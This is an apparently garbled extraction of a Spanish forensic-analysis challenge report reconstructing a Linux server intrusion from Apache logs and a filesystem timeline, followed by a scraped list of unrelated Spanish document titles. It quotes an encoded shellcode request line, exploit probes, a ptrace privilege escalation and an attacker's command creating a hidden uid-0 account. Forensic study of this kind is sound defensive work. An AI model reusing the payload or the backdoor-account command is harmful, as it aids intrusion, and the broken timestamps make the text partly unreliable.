u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" " " " " error_log Página 16

17 [Fri Jan 28 10:58: ] [error] [client ] File does not exist: /var/www/html/default.ida /01/ :00: :00:28: 42 accesos desde buscando urls típicas de Gallery Photo Album. Las versiones <= de este producto permiten la ejecución local y/o remota de código [28/Jan/2005:13:00: ] "GET /gallery/skins/hotred/css/embedded_style.css HTTP/1.1" "http://localhost/gallery/" "Mozilla/5.0 (X11; U; Linux i686; en US; rv:1.7.5) Gecko/ Debian/ " [28/Jan/2005:13:00: ] "GET /gallery/html_wrap/frames/simple_book/br.gif HTTP/1.1" "http://localhost/gallery/" "Mozilla/5.0 (X11; U; Linux i686; en US; rv:1.7.5) Gecko/ Debian/ " /012005:13:02:04 Accesos licitos desde Fri Jan :02: a. / rw r r root root /var/www/html/poweredby.png 2326.a. / rw r r root root /var/www/icons/apache_pb.gif 2890.a. / rw r r root root /var/www/html/index.html [28/Jan/2005:13:02: ] "GET / HTTP/1.1" " " "Mozilla/5.0 (X11; U; Linux i686; en US; rv:1.7.5) Gecko/ Firefox/1.0 (Debian package 1.0 3)" [28/Jan/2005:13:02: ] "GET /icons/apache_pb.gif HTTP/1.1" "http:// /" "Mozilla/5.0 (X11; U; Linux i686; en US; rv:1.7.5) Gecko/ Firefox/1.0 (Debian package 1.0 3)" [28/Jan/2005:13:02: ] "GET /poweredby.png HTTP/1.1" "http:// /" "Mozilla/5.0 (X11; U; Linux i686; en US; rv:1.7.5) Gecko/ Firefox/1.0 (Debian package 1.0 3)" [28/Jan/2005:13:02: ] "GET /favicon.ico HTTP/1.1" " " "Mozilla/5.0 (X11; U; Linux i686; en US; rv:1.7.5) Gecko/ Firefox/1.0 (Debian package 1.0 3)" 3. 28/01/ :24:34 13:40:51 Ante la avalancha de conexiones de red provocadas por el administrador de la máquina, posiblemente alertado por un IDS, se apresura a conectarse e investigar lo sucedido comprobando quién se ha conectado, le echa un vistazo a los ficheros de logs y a los de configuración, comprueba los modulos cargados, etc Se ejecuta el comando /usr/bin/last que fuerza la lectura de /var/log/wtmp Fri Jan :24: a. / rwxr xr x root root /usr/bin/last 0.a. / rw rw r root utmp /var/log/wtmp (deleted) 0.a. rw rw r root utmp <hda3.dd dead 96009> Se edita el fichero de mensajes y como posteriormente se pierde la conexión se queda una copia de respaldo Fri Jan :25:43 0 mac rw root root <hda3.dd dead 96032> 3644.a. / rw r r root root /usr/share/vim/vim61/macros/vimrc;41efd370 (deleted realloc) 0 mac / rw root root /var/log/.messages.swpx (deleted) 0.a. / rw root root /var/log/.messages.swp (deleted) 3644.a. / rw r r root root /usr/share/vim/vim61/macros/vimrc 0.a. rw root root <hda3.dd dead 96031> Fri Jan :27:29 0 m.c / rw root root /var/log/.messages.swp (deleted) 0 m.c rw root root <hda3.dd dead 96031> Página 17

18 Fri Jan :29: a. / rwxr xr x root root /dev/makedev Se consultan los modulos cargados en el kernel /sbin/lsmod, los logs de mysqld, el cron y la configuracion de Apache (httpd.conf) Fri Jan :30:04 6.a. l/lrwxrwxrwx root root /sbin/lsmod > insmod Fri Jan :30:52 0.a. / rw r mysql mysql /var/log/mysqld.log (deleted) 0.a. rw r mysql mysql <hda3.dd dead 96023> Fri Jan :31:02 0.a. / rw r mysql mysql /var/log/mysqld.log.1 (deleted) 0.a. rw r mysql mysql <hda3.dd dead 96014> Fri Jan :31: a. / rwsr xr x root root /usr/bin/crontab Fri Jan :33: a. / rw r r root root 932 /etc/httpd/conf/httpd.conf Con motivo de la visualización de un fichero con caracteres no visualizables se desconfigura el terminal, nuestro amigo intenta resetearlo (tset) y comprobar que tipo de fichero (/usr/bin/file) es el que ha provocado el desaguisado Fri Jan :37: a. / rwxr xr x root root /usr/bin/tset 4.a. l/lrwxrwxrwx root root /usr/bin/reset > tset Fri Jan :37: a. / rw r r root root /usr/share/magic.mgc a. / rwxr xr x root root /usr/bin/file Fri Jan :38:12 0.a. rw r r root root <hda3.dd dead >Fri Jan :38: a. / rw r r root root /usr/share/locale/es/lc_messages/fileutils.mo Fri Jan :38:40 0.a. rw r r root root <hda3.dd dead >Fri Jan 28 Parece que no soluciona el problema y se ve obligado a iniciar una nueva sesión en la que lee el correo pasando tres mensajes de /var/spool/mail/root a /root/mbox Fri Jan :38: a. / rw r r root root /etc/pam.d/login 114.a. / rw root root /etc/securetty 8296.a. / rwxr xr x root root /lib/security/pam_securetty.so Fri Jan :38: a. / rw r r root root /etc/inputrc 0.a. / rw r r root root /etc/motd 842.a. / rw r r root root /etc/profile Fri Jan :39: a. / rw r r root root /usr/lib/mail.help Fri Jan :40: m.c l/ rw root root /etc/rc.d/rc1.d/k73ypbind (deleted realloc) 3240 m.c / rw root root /root/mbox Fri Jan :40: a. / rw root root /var/spool/mail/root Fri Jan :48: a. / rw r r root root /usr/share/locale/es/lc_messages/util linux.mo Fri Jan :48:39 0.a. rw r r root root <hda3.dd dead 80026> Fri Jan :48: m.c / rw rw r root utmp /var/run/utmp 2862.a. / rw r r root root /etc/security/pam_env.conf 1580.a. / rw r r root root /usr/share/terminfo/l/linux a. / rwxr xr x root root /sbin/mingetty 3172.a. / rwxr xr x root root /usr/bin/clear Página 18

19 0 mac c/crw root root /dev/tty1 57.a. / rw r r root root /etc/issue 4. 28/01/ :03:21 Acceso anónimo? al servidor ftp desde Fri Jan :03: a. / rw root root /etc/ftpconversions 19.a. l/lrwxrwxrwx root root /usr/share/ssl/cert.pem > certs/ca bundle.crt 1906.a. / rw root root /etc/ftpaccess a. / rwxr xr x bin bin /usr/sbin/in.ftpd Fri Jan :03: a. / rw r r root root /usr/share/ssl/private/ftpd rsa key.pem a. / rw r r root root /usr/share/ssl/certs/ca bundle.crt 741.a. / rw r r root root /usr/share/ssl/certs/ftpd rsa.pem 1024 m.c / rw root root /usr/share/ssl/.rnd Tambien se registra en el mensaje enviado por logwatch el Sat Jan 29 04:02: /01/ :26:54 Por las trazas encontradas en los logs de Apache recuperados podría tratarse de un intento de acceso fallido por alguna de las variantes del gusano Apache mod_ssl/slapper/bugtraq.c html o de alguien intentando ejecutar manualmente el código de explotación del gusano desde Información de las trazas en los logs access_log [28/Jan/2005:21:26: ] "GET /mod_ssl:error:http request HTTP/1.0" [28/Jan/2005:21:26: ] "GET /mod_ssl:error:http request HTTP/1.0" error_log [Fri Jan 28 21:26: ] [error] mod_ssl: SSL handshake failed: HTTP spoken on HTTPS port; trying to send HTML error page (OpenSSL library error follows) [Fri Jan 28 21:26: ] [error] OpenSSL: error: c:lib(20):func(118):reason(156) [Fri Jan 28 21:26: ] [error] mod_ssl: SSL handshake failed: HTTP spoken on HTTPS port; trying to send HTML error page (OpenSSL library error follows) ssl_engine [28/Jan/2005:21:26: ] "GET /mod_ssl:error:http request HTTP/1.0" /01/ :57: :00:01 Entrada al sistema como usuario Apache desde la IP access_log [29/Jan/2005:14:57: ] "GET / HTTP/1.1" " " " " [29/Jan/2005:14:57: ] "GET / HTTP/1.1" " " " " error_log [Sat Jan 29 14:57: ] [error] [client ] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): / [Sat Jan 29 14:57: ] [error] [client ] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): / Página 19

20 [Sat Jan 29 14:58: ] [error] mod_ssl: SSL handshake failed (server :443, client ) (OpenSSL library error follows) [Sat Jan 29 15:00: ] [error] mod_ssl: SSL handshake failed (server :443, client ) (OpenSSL library error follows) 7. 29/01/ :11:44..15:16:49 Escalada de privilegios Una vez conseguido el acceso a una cuenta en el sistema el siguiente paso es hacerse con la máquina para ello se descarga por ftp un exploit local que abre un shell con privilegios de root aprovechándose de una vulnerabilidad de los kernel 2.4.X en la llamada al sistema ptrace, lo ejecuta y de paso nos infecta la máquina con el virus linux.rst (/dev/hdx1 y / dev/hdx2) Sat Jan :11: a. / rwxr xr x root root /usr/bin/ftp Sat Jan :16: m.c / rwxr xr x root root /bin/gawk 0 mac / root root /dev/hdx m.c d/drwxr xr x root root /dev m.c / rwxr xr x root root /bin/gawk mac / root root /dev/hdx /01/ :17: :27:24 Gran parte de la actividad de los intrusos ha quedado almacenada en /bash_history Paso a comentar lo registrado en el /.bash_history contrastandolo con el timeline y los rastros encontrados en las imágenes. Por defecto el formato será: Comentario Contenido de.bash_history en cursiva timeline asociado en un recuadro donde se aprecia la hora exacta Otras evidencias 8.1. Se asegura que es root id 8.2. A las 15:17:13 primera creación del usuario weed con uid y gid 0, es decir, como root y cambio de contraseña: se observa la creación de home de weed. /usr/sbin/adduser g 0 u 0 o weed passwd weed Sat Jan :17: mac / rw r r root root /home/weed/.bash_profile 4096 m.c d/drwx root root /home/weed 124.a. / rw r r root root /etc/skel/.bashrc;41efd370 (deleted realloc) 124 mac / rw r r root root /home/weed/.bashrc 0 mac / rw rw root root /var/spool/mail/weed 124.a. / rw r r root root /etc/skel/.bashrc 24.a. / rw r r root root /etc/skel/.bash_logout 191.a. / rw r r root root /etc/skel/.bash_profile Página 20

II Reto de Análisis Forense Hispano

II Reto de Análisis Forense Hispano II Reto de Análisis Forense Hispano http://www.seguridad.unam.mx/eventos/reto Víctor Barahona Tecnologías de la Información Universidad Autónoma de Madrid Jornadas de Análisis Forense 2005, Madrid Antecedentes

Más detalles

Reto de Análisis Forense INFORME TÉCNICO

Reto de Análisis Forense INFORME TÉCNICO Reto de Análisis Forense INFORME TÉCNICO 31 de diciembre de 2003 Dado que este informe se va a presentar como documento técnico en un foro dedicado a la promoción de las técnicas y herramientas que permiten

Más detalles

INFORME EJECUTIVO ANÁLISIS FORENSE. Hostname: finanzas S.O.: Red Hat Linux versión 7.3 (Valhalla) Autor: Rafael García O.

INFORME EJECUTIVO ANÁLISIS FORENSE. Hostname: finanzas S.O.: Red Hat Linux versión 7.3 (Valhalla) Autor: Rafael García O. INFORME EJECUTIVO ANÁLISIS FORENSE Hostname: finanzas S.O.: Red Hat Linux versión 7.3 (Valhalla) Autor: Rafael García O. INTRODUCCIÓN La máquina finanzas, un servidor con S.O. Red Hat Linux versión 7.3

Más detalles

Recuperación ante ataques

Recuperación ante ataques 1 INTRODUCCIÓN ÍNDICE GENERAL Recuperación ante ataques IRIS-CERT 14 de Noviembre de 2000 Resumen Otro documento, mezcla de varios para contar con toda la información en conjunto sobre

Más detalles

Registros del sistema

Registros del sistema Registros del sistema Seguridad en los Sistemas Informáticos Ismael Ripoll Universidad Politècnica de València Abril 2011 Ismael Ripoll (Universidad Politècnica de València) Registros del sistema Abril

Más detalles

labs Linux para Administradores de Elastix Elastix Certification ELASTIX CERTIFICATION

labs Linux para Administradores de Elastix Elastix Certification ELASTIX CERTIFICATION Linux para Administradores de Elastix Elastix Certification 2012, PALOSANTO SOLUTIONS todos los derechos reservados. Esta documentación y su propiedad intelectual pertenece a PaloSanto Solutions. Cualquier

Más detalles

UNIVERSIDAD DON BOSCO FACULTAD DE ESTUDIOS TECNOLÓGICOS ESCUELA DE COMPUTACIÓN

UNIVERSIDAD DON BOSCO FACULTAD DE ESTUDIOS TECNOLÓGICOS ESCUELA DE COMPUTACIÓN UNIVERSIDAD DON BOSCO FACULTAD DE ESTUDIOS TECNOLÓGICOS ESCUELA DE COMPUTACIÓN CICLO: 02/2015 GUÍA DE LABORATORIO #6 Nombre de la Practica: Instalación de FreeBSD para Server. Tiempo Estimado: 2 horas

Más detalles

si por el contrario, queremos compilarlo, tendremos que realizar los siguientes pasos: cd netinvent./configure make make install

si por el contrario, queremos compilarlo, tendremos que realizar los siguientes pasos: cd netinvent./configure make make install Manual de usuario NetInvent (servidor) Netinvent se proporciona en una paquete comprimido en formato netinvent.tar.gz. Este formato es uno de los comúnmente utilizados para distribuir los programas bajos

Más detalles

Linux Principios básicos de uso del sistema [4ª edición]

Linux Principios básicos de uso del sistema [4ª edición] Introducción 1. Historia de Unix 11 2. GNU 13 2.1 FSF 14 2.2 CopyLeft y GPL 14 3. Linux 16 3.1 Características 18 3.2 Distribuciones 20 4. Qué distribución elegir? 20 4.1 Las distribuciones para el "gran

Más detalles

Administración de sistemas UNIX/Linux Ejercicio práctico optativo (IX)

Administración de sistemas UNIX/Linux Ejercicio práctico optativo (IX) Administración de sistemas UNIX/Linux Ejercicio práctico optativo (IX) 2012/2013 Introducción En este ejercicio vamos a configurar una de las máquinas para que albergue el sistema raíz de la otra y provea

Más detalles

Clase 23 FTP. Telnet. Ejemplos Tema 6.- Nivel de aplicación en Internet

Clase 23 FTP. Telnet. Ejemplos Tema 6.- Nivel de aplicación en Internet Clase 23 FTP. Telnet. Ejemplos Tema 6.- Nivel de aplicación en Internet Dr. Daniel Morató Redes de Computadores Ingeniero Técnico de Telecomunicación Especialidad en Sonido e Imagen 3º curso Temario 1.-

Más detalles

PRÁCTICA Descripción y Configuración del Laboratorio

PRÁCTICA Descripción y Configuración del Laboratorio PRÁCTICA Descripción y Configuración del Laboratorio 1. INTRODUCCIÓN El arranque que elegiremos de entre todas la ofertas del laboratorio será: Fedora Core 7 - WEB. Una vez introducido nuestro login y

Más detalles

Escuela de Ingeniería Electrónica CAPITULO 10 LINUX

Escuela de Ingeniería Electrónica CAPITULO 10 LINUX CAPITULO 10 LINUX AGENDA Administración de la interfase del usuario. Cuentas para usuarios y grupos Administración de servicios y archivos del sistema Daemons (demonios) 2 Instalación de Linux La instalación

Más detalles

Continuous Delivery (y 3)

Continuous Delivery (y 3) Continuous Delivery (y 3) Sesión 11a 2 Entornos de prueba La última parte de la tubería de despliegue consiste en probar los builds compilados en distintos entornos de prueba Distintos entornos Tests de

Más detalles

Puesta en marcha de un SGBD local para Linux y máquinas virtuales

Puesta en marcha de un SGBD local para Linux y máquinas virtuales Puesta en marcha de un SGBD local para Linux y máquinas virtuales Dídac Gil de la Iglesia P07/50011/02646 FUOC P07/50011/02646 Puesta en marcha de un SGBD local para Linux y máquinas virtuales Índice

Más detalles

SILLABUS CURSO : LINUX

SILLABUS CURSO : LINUX SILLABUS CURSO : LINUX Administración DURACIÓN : 8 sesiones de 3 horas cada sesión Horarios : Grupo 1 : Lunes Miércoles -Viernes (8:00 pm a 11 :00 pm) Grupo 2 : Martes Jueves ( 7:00 pm 10 :00 pm) SUMILLA

Más detalles

DNS: 53000. CTF Ekoparty 2012 Autor: Marcelo Echeverría Twitter: @marceloje URL: http://emyei.immunix.com.ar/ Email: marcelo@null-life.com.

DNS: 53000. CTF Ekoparty 2012 Autor: Marcelo Echeverría Twitter: @marceloje URL: http://emyei.immunix.com.ar/ Email: marcelo@null-life.com. CTF Ekoparty 2012 Autor: Marcelo Echeverría Twitter: @marceloje URL: http://emyei.immunix.com.ar/ Email: marcelo@null-life.com DNS: 53000 Se extraen los datos del servicio DNS: $ nslookup > set port=53000

Más detalles

Practica 3: Infraestructuras Web

Practica 3: Infraestructuras Web Comercio Electrónico Practica 3: Infraestructuras Web Antonio Sanz ansanz@unizar.es Rafael del Hoyo rdelhoyo@ita.es Objetivo de la práctica Definir los diversos elementos de una infraestructura de comercio

Más detalles

Monitoreo de redes. Ing. Diego Córdoba www.linuxinstitute.com.ar Pagina 1 de 9

Monitoreo de redes. Ing. Diego Córdoba www.linuxinstitute.com.ar Pagina 1 de 9 Monitoreo de redes Ing. Diego Córdoba www.linuxinstitute.com.ar Pagina 1 de 9 HIDS: Host Intrusion Detection System OSSEC es un Host Intrusion Detection System, cuya principal función es realizar controles

Más detalles

66.69 CRIPTOGRAFÍA Y SEGURIDAD INFORMÁTICA

66.69 CRIPTOGRAFÍA Y SEGURIDAD INFORMÁTICA Departamento de Electrónica Facultad de Ingeniería. Universidad de Buenos Aires. Seguridad en UNIX Temas Introducción System V vs Berkeley Kernel y Shells Como obtener Ayuda File System Administración

Más detalles

Reto de Análisis Forense V2.0 UNAM CERT / IRIS CERT

Reto de Análisis Forense V2.0 UNAM CERT / IRIS CERT Reto de Análisis Forense V2.0 UNAM CERT / IRIS CERT Informe Tecnico Ing.-Juan Angel Hurtado 1 1.- Introducción. 3 1.1 - Descripción del documento. 3 1.2 - Objetivo. 3 1.3 - Audiencia. 3 1.4 - Resumen.

Más detalles

La Jerarquía de Sistema de Archivos Estándar en GNU/Linux (FHS)

La Jerarquía de Sistema de Archivos Estándar en GNU/Linux (FHS) La Jerarquía de Sistema de Archivos Estándar en GNU/Linux (FHS) [ admin basico gnu ] Marcelo López Minnucci 17 de octubre de 2015 Objetivo del tutorial Conocer la ubicación estándar

Más detalles

LABORATORIO DE FTP. PRESENTADO POR: Diana Maritza Aragón Marta Moreno Luis Miguel Pérez. PRESENTADO A: Marcelo Utard Javier Bozzuto

LABORATORIO DE FTP. PRESENTADO POR: Diana Maritza Aragón Marta Moreno Luis Miguel Pérez. PRESENTADO A: Marcelo Utard Javier Bozzuto LABORATORIO DE FTP PRESENTADO POR: Diana Maritza Aragón Marta Moreno Luis Miguel Pérez PRESENTADO A: Marcelo Utard Javier Bozzuto ESCUELA DE GRADUADOS DE ELECTRÓNICA Y TELECOMUNICACIONES LABORATORIO DE

Más detalles

Administración de usuarios

Administración de usuarios Administración de usuarios La administración de las cuentas de los usuarios y sus grupos de trabajo implica una gran responsabilidad, pues el primer paso para mantener la seguridad del sistema consiste

Más detalles

Sistemas de Ficheros en GNU/Linux

Sistemas de Ficheros en GNU/Linux en GNU/Linux Page 1 Nota de Copyright 2005. Algunos derechos reservados. Este trabajo se distribuye bajo la licencia Creative Commons Attribution-ShareAlike. Para obtener la licencia completa, véase http://creativecommons.org/licenses/by-sa/2.1/es

Más detalles

Software de Comunicaciones. Práctica 7 - Secure Shell. SSH

Software de Comunicaciones. Práctica 7 - Secure Shell. SSH Software de Comunicaciones Práctica 7 - Secure Shell. SSH Juan Díez-Yanguas Barber Software de Comunicaciones Ingeniería Informática - 5º Curso Jdyb - Mayo 2013 Juan Díez- Yanguas Barber Práctica 7 Índice

Más detalles

Comandos Linux Ayuda. Archivos y directorios

Comandos Linux Ayuda. Archivos y directorios Comandos Linux Ayuda man muestra manual del comando que le indiquemos --help da una ayuda de los comandos Archivos y directorios ls lista los archivos y directorios sort ordena alfabéticamente una lista

Más detalles

Universidad Autónoma de Nuevo León Facultad de Ciencias Físico Matemáticas. Laboratorio de Seguridad en aplicaciones web

Universidad Autónoma de Nuevo León Facultad de Ciencias Físico Matemáticas. Laboratorio de Seguridad en aplicaciones web Universidad Autónoma de Nuevo León Facultad de Ciencias Físico Matemáticas Laboratorio de Seguridad en aplicaciones web Practica 1: Guía de configuración de laboratorio objetivos: Familiarizar al estudiante

Más detalles

Curso Taller de Química Computacional Módulo II. PRACTICO 1 Introducción al uso del sistema operativo Linux.

Curso Taller de Química Computacional Módulo II. PRACTICO 1 Introducción al uso del sistema operativo Linux. Curso Taller de Química Computacional Módulo II PRACTICO 1 Introducción al uso del sistema operativo Linux. Objetivos : Aprender a conectarse con la maquina desde una terminal remota e iniciar una sesión.

Más detalles

WDpStats Procedimiento de instalación

WDpStats Procedimiento de instalación WDpStats Procedimiento de instalación Tabla de contenidos WDpStats... 1 Procedimiento de instalación... 1 Tabla de contenidos... 1 Resumen... 2 Requisitos... 2 Instalación... 2 Dificultades... 6 Ejecución...

Más detalles

VIRTUALIZACIÓN: VMWare Workstation

VIRTUALIZACIÓN: VMWare Workstation INDICE Qué es VMWare? Y a mí para qué me sirve VMWare? Si ejecuto un archivo malicioso en la máquina virtual, le ocurrirá algo a mi PC? Qué necesito para poder crear una máquina virtual en VMWare? Instalación

Más detalles

Instalación y configuración de VMware Server

Instalación y configuración de VMware Server 1 de 19 01/12/2007 1:47 Instalación y configuración de VMware Server VMware Server 1.0.3, En este procedimiento se explica un producto de VMware, llamado VMware Server. Es un software que corre sobre un

Más detalles

ADMINISTRACIÓN DE SERVIDORES CON

ADMINISTRACIÓN DE SERVIDORES CON ADMINISTRACIÓN DE SERVIDORES CON Que es: Webmin se ejecuta en un servidor web, por ejemplo apache y consiste en un conjunto de programas escritos en CGI escritos en Perl versión 5. Desde Webmin se pueden

Más detalles

Cuentas. Guía 1er laboratorio Linux - Comandos - Fork. Programación en C. Linux. Linux: Cuenta (passwd): sisop@labs.cs.uns.edu.ar (sis2013op..

Cuentas. Guía 1er laboratorio Linux - Comandos - Fork. Programación en C. Linux. Linux: Cuenta (passwd): sisop@labs.cs.uns.edu.ar (sis2013op.. Cuentas Guía 1er laboratorio Linux - Comandos - Fork Linux: Cuenta (passwd): sisop@labs.cs.uns.edu.ar (sis2013op..) Windows: Cuenta (passwd): So (s2013o..) Programación en C Linux sobre Linux: gcc compiler

Más detalles

Creación y recuperación de imágenes de partición

Creación y recuperación de imágenes de partición Creación y recuperación de imágenes de partición Tabla de contenido 1. Introducción...1 2. Crear una imagen de una partición...2 2.1 Arranque del sistema con SystemRescueCD...3 2.2 Crear una partición

Más detalles

APLICACIONES de PROTOCOLOS del NIVEL de APLICACION

APLICACIONES de PROTOCOLOS del NIVEL de APLICACION APLICACIONES de PROTOCOLOS del NIVEL de APLICACION OBJETIVOS: Familiarizar al alumno con aplicaciones básicas montadas sobre protocolos del nivel de aplicación que se apoyan sobre TCP/IP. o Aplicaciones:

Más detalles

instalación de MOODLE en Guadalinex V4

instalación de MOODLE en Guadalinex V4 instalación de MOODLE en Guadalinex V4 Para instalar MOODLE en nuestro Guadalinex es necesario disponer de la contraseña de administrador. Esto excluye a los ordenadores de los centros TIC, ya que dicha

Más detalles

Montaje de particiones

Montaje de particiones Instituto Tecnológico de Costa Rica Programa Mantenimiento de Computadoras Personales Curso: Linux Profesor: Ing. Javier Pérez Rodríguez Montaje de particiones Ubuntu reconoce automáticamente la conexión

Más detalles

Usuarios, Grupos y Permisos en GNU/Linux

Usuarios, Grupos y Permisos en GNU/Linux Usuarios, Grupos y Permisos en GNU/Linux Page 1 Nota de Copyright 2005 Diego Chaparro. Algunos derechos reservados. Este trabajo se distribuye bajo la licencia Creative Commons Attribution-ShareAlike.

Más detalles

Incidentes de seguridad en equipos Linux

Incidentes de seguridad en equipos Linux Incidentes de seguridad en equipos Linux Francisco Jesús Monserrat Coll Centro de Comunicaciones del CSIC RedIRIS francisco.monserrat@rediris.es A pesar de la seguridad que pueden ofrecer los sistemas

Más detalles

Servicios clásicos de Internet

Servicios clásicos de Internet Daniel Morató Area de Ingeniería Telemática Departamento de Automática y Computación Universidad Pública de Navarra daniel.morato@unavarra.es Laboratorio de Interfaces de Redes http://www.tlm.unavarra.es/asignaturas/lir

Más detalles

INSTALACION VIRTUALIZADA DE UBUNTU SERVER CON SERVICIOS LAMP Y OPENSSH SOBRE VIRTUAL BOX. Nicolás Botero Botero Juan Manuel Velásquez Isaza

INSTALACION VIRTUALIZADA DE UBUNTU SERVER CON SERVICIOS LAMP Y OPENSSH SOBRE VIRTUAL BOX. Nicolás Botero Botero Juan Manuel Velásquez Isaza INSTALACION VIRTUALIZADA DE UBUNTU SERVER CON SERVICIOS LAMP Y OPENSSH SOBRE VIRTUAL BOX Nicolás Botero Botero Juan Manuel Velásquez Isaza Universidad Tecnológica de Pereira Facultad de Ingenierías Ingeniería

Más detalles

Bitácora del sistema - Introducción

Bitácora del sistema - Introducción Bitácora del sistema M A T E R I A : A R Q U I T E C T U R A A V A N Z A D A P R O F E S O R : J U A N J O S E M U Ñ O Z A L U M N O : F E D E R I C O D I B E N E D E T T O M A T R I C U L A : 7 6 5 6

Más detalles

Apartado: Configuración servicios de un servidor PXE. Versión: 3.0 Título: Programa Netcat Fecha: 22/11/07

Apartado: Configuración servicios de un servidor PXE. Versión: 3.0 Título: Programa Netcat Fecha: 22/11/07 *PRÓPOSITO. Netcat (a menudo referida como la navaja multiusos de los hackers o para expertos en seguridad) es una herramienta de red bajo licencia GPL disponible para sistemas UNIX, Microsoft y Apple

Más detalles

Toda la información de instalación se puede encontrar en el fichero "install.log".

Toda la información de instalación se puede encontrar en el fichero install.log. MAST STORAGE Instalación Linux 1. Descargue el archivo de instalación (obm-nix.tar.gz) y ejecútelo. 2. Descomprima el fichero de instalación en /usr/local/obm mkdir /usr/local/obm cd /usr/local/obm gunzip

Más detalles

MÒDUL 1: Instal lació, administració, gestió i implementació del servidor web i la seva seguretat. Servidores FTP en Sistemas Windows

MÒDUL 1: Instal lació, administració, gestió i implementació del servidor web i la seva seguretat. Servidores FTP en Sistemas Windows MÒDUL 1: Instal lació, administració, gestió i implementació del servidor web i la seva seguretat Servidores FTP en Sistemas Windows 1. Servicios FTP - Servidor FTP - Cliente FTP 2. Instalación IIS-FTP

Más detalles

Autor: Prof. Pedro A. Hernández correo: pedroadonis@gmail.com Versión 1.0

Autor: Prof. Pedro A. Hernández correo: pedroadonis@gmail.com Versión 1.0 Tema: Unidad 3. Los comandos que se presenta en esta práctica son para el manejo de los archivos del Sistema Operativo GNU/Linux. Tiempo estimado de Ejecución : 1.30 H Valoración: 10% Objetivo: Dar a conocer

Más detalles

Table of Contents DNS. Samba. Usuarios. Equipos. Configuración de red. Añadir equipo al dominio. Recursos Compartidos.

Table of Contents DNS. Samba. Usuarios. Equipos. Configuración de red. Añadir equipo al dominio. Recursos Compartidos. Table of Contents DNS Samba Usuarios Equipos Configuración de red Añadir equipo al dominio Recursos Compartidos Compartir carpeta Perfiles móviles DNS Un Servidor de Nombres, o Domain Name Server es un

Más detalles

WEBGTVL Puesta a punto de los servidores Fedora Linux antes de su paso a producción

WEBGTVL Puesta a punto de los servidores Fedora Linux antes de su paso a producción WEBGTVL Puesta a punto de los servidores Fedora Linux antes de su paso a producción Agosto 2009 2 Cliente Proyecto WEBGTVL Fase I Fecha documento 03/08/09 Documento Tipo de documento Puesta a punto de

Más detalles

Un laboratorio bajo lupa

Un laboratorio bajo lupa Un laboratorio bajo lupa Claudio Salazar Security Research Team (cc) pablolizardo Una estructura común Root Ayudantes Ayudantes Ayudantes Ayudantes Usuario Usuario Usuario Usuario Usuario Usuario Usuario

Más detalles

II. DISEÑO DEL SISTEMA. Introducción Instalación por red Arranque por red

II. DISEÑO DEL SISTEMA. Introducción Instalación por red Arranque por red II. DISEÑO DEL SISTEMA Introducción Instalación por red Arranque por red Qué es un cluster? Cluster de memoria Distribuida Nuestro Diseño Login SERVER PXE, NFS,TFTP, DHCP Internet DISKS NODOS DE COMPUTO

Más detalles

MANUAL TECNICO DE INSTALACIÓN OCS INVENTORY

MANUAL TECNICO DE INSTALACIÓN OCS INVENTORY MANUAL TECNICO DE INSTALACIÓN OCS INVENTORY ÍNDICE INTRODUCCIÓN.2 INSTALACION.3 COMO RESOLVER LAS ALERTAS DE SEGURIDAD.9 CÓMO MANEJAR ESTA APLICACIÓN? 13 INSTALACION DEL AGENTE (CLIENTE) EN WINDOWS.17

Más detalles

Fedora Core GNU/LINUX

Fedora Core GNU/LINUX Fedora Core GNU/LINUX Entrega 8 Comandos básicos man Mostrar paginas de manual de otros comandos. man ls clear Limpia la pantalla. clear ls touch Listar los archivos y directorios de una ruta especifica.

Más detalles

1. CARACTERÍSTICAS DE LINUX.

1. CARACTERÍSTICAS DE LINUX. UNIDAD 1: EL SISTEMA OPERATIVO LINUX 1. CARACTERÍSTICAS DE LINUX. El sistema operativo LINUX es un conjunto de programas y una serie de utilidades que permiten al usuario gestionar los recursos hardware

Más detalles

11224 Gestión Avanzada de OpenGnSys

11224 Gestión Avanzada de OpenGnSys 11224 Gestión Avanzada de OpenGnSys Ramón M. Gómez Labrador ( ramongomez ARROBA us.es ) Febrero de 2011 Índice Introducción Arquitectura Instalación y configuración Modos de ejecución del cliente API del

Más detalles

Seguridad en Redes de Comunicación

Seguridad en Redes de Comunicación Seguridad en Redes de Comunicación Prác%ca 4. SSL / TLS Jorge Lanza Calderón Luis Sánchez González Departamento de Ingeniería de Comunicaciones Este tema se publica bajo Licencia: Crea:ve Commons BY- NC-

Más detalles

Al igual que HTTP, FTP se basa en el envío de comandos codificados mediante ASCII, es decir, en texto plano.

Al igual que HTTP, FTP se basa en el envío de comandos codificados mediante ASCII, es decir, en texto plano. FTP (FILE TRANSFER PROTOCOL) FTP es un programa que se utiliza para transferir información, almacenada en ficheros, de una máquina remota a otra local, o viceversa (RFC 959). Para poder realizar esta operación

Más detalles

GNU/Linux Administración Básica

GNU/Linux Administración Básica Networking Quality and Security 22 de marzo de 2006 Parte I Administración básica Directorios básicos Sistema / Directorio raíz. El resto de directorios cuelgan de él. /bin Mandatos binarios esenciales

Más detalles

Funcionamiento de Servicios Web, FTP

Funcionamiento de Servicios Web, FTP Funcionamiento de Servicios Web, FTP Tema 2.- Nivel de aplicación en Internet Dr. Daniel Morató Redes de Computadores Ingeniero Técnico en Informática de Gestión, 2º curso Material adaptado del libro Computer

Más detalles

SAMBA y NFS GNU/Linux

SAMBA y NFS GNU/Linux 1 SAMBA y NFS GNU/Linux Redes y Servicios Contenidos 2 1. Introducción 2. SAMBA 3. NFS 1.1. Instalación y configuración 1.2. Cliente 1.3. Configuración con asistentes 2.1. Configuración del servidor 2.2.

Más detalles

De verdad es Linux más seguro? Francisco Jesus Monserrat Coll, IRIS-CERT,RedIRIS II Jornadas CALDUM Murcia 11 de Julio 2005

De verdad es Linux más seguro? Francisco Jesus Monserrat Coll, IRIS-CERT,RedIRIS II Jornadas CALDUM Murcia 11 de Julio 2005 De verdad es Linux más seguro? Francisco Jesus Monserrat Coll, IRIS-CERT,RedIRIS II Jornadas CALDUM Murcia 11 de Julio 2005 Índice Introducción Problemas de seguridad en Código Libre Soluciones RedIRIS

Más detalles

Facultad de Ingeniería Universidad de Buenos Aires. 75.08 Sistemas Operativos Lic. Ing. Osvaldo Clúa Lic. Adrián Muccio.

